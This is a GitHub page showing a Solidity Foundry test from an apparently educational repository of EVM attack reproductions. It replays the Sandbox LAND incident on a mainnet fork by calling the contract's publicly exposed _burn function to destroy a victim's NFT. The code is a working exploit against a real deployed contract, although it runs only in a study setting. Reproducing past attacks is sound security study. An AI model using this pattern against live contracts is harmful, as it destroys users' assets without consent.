forked from coinspect/learn-evm-attacks
-
Notifications
You must be signed in to change notification settings - Fork 1
/
Sandbox.attack.sol
41 lines (31 loc) · 1.3 KB
/
Sandbox.attack.sol
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.17;
import "forge-std/Test.sol";
import {TestHarness} from "../../TestHarness.sol";
import {TokenBalanceTracker} from '../../modules/TokenBalanceTracker.sol';
interface ILand {
function _burn(
address from,
address owner,
uint256 id
) external;
function _numNFTPerAddress(address) external view returns (uint256);
}
contract Exploit_SandBox is TestHarness{
address internal attacker = 0x6FB0B915D0e10c3B2ae42a5DD879c3D995377A2C;
address internal victim = 0x9cfA73B8d300Ec5Bf204e4de4A58e5ee6B7dC93C;
ILand internal land = ILand(0x50f5474724e0Ee42D9a4e711ccFB275809Fd6d4a);
function setUp() external {
cheat.createSelectFork('mainnet', 14163041); // We pin one block before the exploit happened.
}
function test_attack() external {
uint256 numOfNFTsVictimBefore = land._numNFTPerAddress(victim);
console.log('------- INITIAL NFT BALANCE OF VICTIM -------');
console.log(numOfNFTsVictimBefore);
land._burn(victim, victim, 3738);
uint256 numOfNFTsVictimAfter = land._numNFTPerAddress(victim);
console.log('------- FINAL NFT BALANCE OF VICTIM -------');
console.log(numOfNFTsVictimAfter);
assertEq(numOfNFTsVictimBefore, numOfNFTsVictimAfter+1);
}
}